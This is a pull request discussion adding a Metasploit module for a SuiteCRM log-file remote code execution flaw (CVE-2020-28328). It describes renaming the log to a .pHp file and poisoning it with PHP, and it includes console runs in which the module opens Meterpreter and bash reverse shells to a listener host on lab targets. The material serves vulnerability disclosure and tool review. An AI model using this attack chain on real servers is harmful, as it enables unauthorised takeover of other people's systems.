Added module and documentation for SuiteCRM Log File RCE CVE-2020-28328

[mcorybillington]

Hello, this is my first PR, so please go easy on me.

I am submitting a module for an exploit I reported (two, technically) to SuiteCRM. The exploit allows for an administrator to modify system settings and control the name of the log file. The attacker can rename the log file to a PHP file and then poison the file with arbitrary PHP code. This code is sanitized to a degree, so the php code you can execute is limited, hence I only have two payloads added: linux/x64/meterpreter_reverse_tcp and cmd/unix/bash_reverse_tcp

This module will cover CVE-2020-28328 as well, however I am still waiting for the current CVE. This was patched in the latest release in April 2021. I requested the CVE ID from the vendor today, and they advised that they have not received it yet from Mitre.

A writeup can be found here:
https://theyhack.me/SuiteCRM-RCE-2/

And a previous writeup/exploit can be found here for the first issue:
https://theyhack.me/CVE-2020-28320-SuiteCRM-RCE/
https://www.exploit-db.com/exploits/49001

Verification

List the steps needed to make sure this thing works.

This is a full run through with both modules.

msf6 > use exploit/linux/http/suitecrm_log_file_rce
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/suitecrm_log_file_rce) > set RHOSTS 192.168.122.29
RHOSTS => 192.168.122.29
msf6 exploit(linux/http/suitecrm_log_file_rce) > set USER admin
USER => admin
msf6 exploit(linux/http/suitecrm_log_file_rce) > set PASS admin
PASS => admin
msf6 exploit(linux/http/suitecrm_log_file_rce) > set SRVHOST 192.168.122.125
SRVHOST => 192.168.122.125
msf6 exploit(linux/http/suitecrm_log_file_rce) > set LHOST 192.168.122.125
LHOST => 192.168.122.125
msf6 exploit(linux/http/suitecrm_log_file_rce) > check

[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[+] SuiteCRM Version 7.11.18
[*] 192.168.122.29:80 - The target appears to be vulnerable.
msf6 exploit(linux/http/suitecrm_log_file_rce) > exploit

[*] Started reverse TCP handler on 192.168.122.125:4444 
[*] Using URL: http://192.168.122.125:8080/NzzKmKY
[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[*] Modifying systems setting file
[*] Poisoning log file
[*] Executing php code in log file: fxg8pi1C.pHp
[+] 192.168.122.29:80 - Payload sent!
[*] Meterpreter session 1 opened (192.168.122.125:4444 -> 192.168.122.29:43346) at 2021-05-21 22:52:15 -0500
[*] Restoring log file to default configuration
[*] Server stopped.
[!] This exploit may require manual cleanup of 'fxg8pi1C.pHp' on the target
[!] This exploit may require manual cleanup of '/tmp/9yCGovF5' on the target

meterpreter > getuid
Server username: daemon @ bb77d61a4df1 (uid=1, gid=1, euid=1, egid=1)
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.21.0.3 - Meterpreter session 1 closed.  Reason: User exit
msf6 exploit(linux/http/suitecrm_log_file_rce) > sessions -i

Active sessions
===============

No active sessions.

msf6 exploit(linux/http/suitecrm_log_file_rce) > set target 1
target => 1
msf6 exploit(linux/http/suitecrm_log_file_rce) > run

[*] Started reverse TCP handler on 192.168.122.125:4444 
[*] Using URL: http://192.168.122.125:8080/Kle8QoPV
[*] Authenticating as admin
[+] Authenticated as: admin
[+] admin has administrative rights.
[*] Modifying systems setting file
[*] Poisoning log file
[*] Executing php code in log file: 1cOyYGE3.pHp
[+] 192.168.122.29:80 - Payload sent!
[*] Command shell session 2 opened (192.168.122.125:4444 -> 192.168.122.29:43366) at 2021-05-21 22:53:03 -0500
[*] Restoring log file to default configuration
[*] Server stopped.
[!] This exploit may require manual cleanup of '1cOyYGE3.pHp' on the target

id
uid=1(daemon) gid=1(daemon) groups=1(daemon)
whoami
daemon
exit
[*] 192.168.122.29 - Command shell session 2 closed.

I will be emailing a runthrough of each section as well to msfdev@metaspolit.com.

[bcoles]

The exploit allows for an administrator to modify system settings and control the name of the log file. The attacker can rename the log file to a PHP file and then poison the file with arbitrary PHP code.

lol. Seems like a regression of the same issue in the same logger_file_name parameter from 9 years ago.

• https://itsecuritysolutions.org/2012-08-30-SugarCRM-Community-Edition-6.5.2-multiple-vulnerabilities/

[space-r7]

Hey @mcorybillington, thank you for the module! I have a few suggestions, with most being related to checking / validating responses.

[space-r7]

Hey @mcorybillington, I added a PR to your branch with a couple of small changes. I went ahead and added those since I missed it in the review. Let me know if those work for you, thanks!

[space-r7]

Tested against 7.11.18 and works great. Congrats on the first module!

msf6 > use exploit/linux/http/suitecrm_log_file_rce 
[*] Using configured payload linux/x64/meterpreter_reverse_tcp
msf6 exploit(linux/http/suitecrm_log_file_rce) > set rhost 127.0.0.1
rhost => 127.0.0.1
msf6 exploit(linux/http/suitecrm_log_file_rce) > set lhost 192.168.37.75
lhost => 192.168.37.75
msf6 exploit(linux/http/suitecrm_log_file_rce) > set user user
user => user
msf6 exploit(linux/http/suitecrm_log_file_rce) > set pass bitnami
pass => bitnami
msf6 exploit(linux/http/suitecrm_log_file_rce) > run

[*] Started reverse TCP handler on 192.168.37.75:4444 
[*] Executing automatic check (disable AutoCheck to override)
[*] Authenticating as user
[+] Authenticated as: user
[+] user has administrative rights.
[+] The target appears to be vulnerable. SuiteCRM 7.11.18
[*] Using URL: http://0.0.0.0:8080/qAHDVx
[*] Local IP: http://192.168.1.94:8080/qAHDVx
[*] Trying - Modify system settings file
[+] Succeeded - Modify system settings file
[*] Trying - Poison log file
[+] Succeeded - Poison log file
[*] Executing php code in log file: 07l5jS2M.pHp
[+] 127.0.0.1:80 - Payload sent!
[*] Meterpreter session 1 opened (192.168.37.75:4444 -> 192.168.37.75:54639) at 2021-06-03 09:09:01 -0500
[*] Trying - Restore logging to default configuration
[+] Succeeded - Restore logging to default configuration
[*] Server stopped.
[!] This exploit may require manual cleanup of '07l5jS2M.pHp' on the target
[!] This exploit may require manual cleanup of '/tmp/dGlRluy4' on the target

meterpreter > getuid
Server username: daemon @ 14f6fcbd2446 (uid=1, gid=1, euid=1, egid=1)
meterpreter > sysinfo
Computer     : 172.18.0.3
OS           : Debian 10.9 (Linux 5.10.25-linuxkit)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

[space-r7]

Release Notes

New module exploit/linux/http/suitecrm_log_file_rce targets SuiteCRM versions 7.11.18 and below. An authenticated user can rename the SuiteCRM log file to have an extension of .pHp. The log file can then be poisoned with arbitrary php code by modifying user account information, such as the user's last name. Authenticated code execution is then achieved by requesting the log file.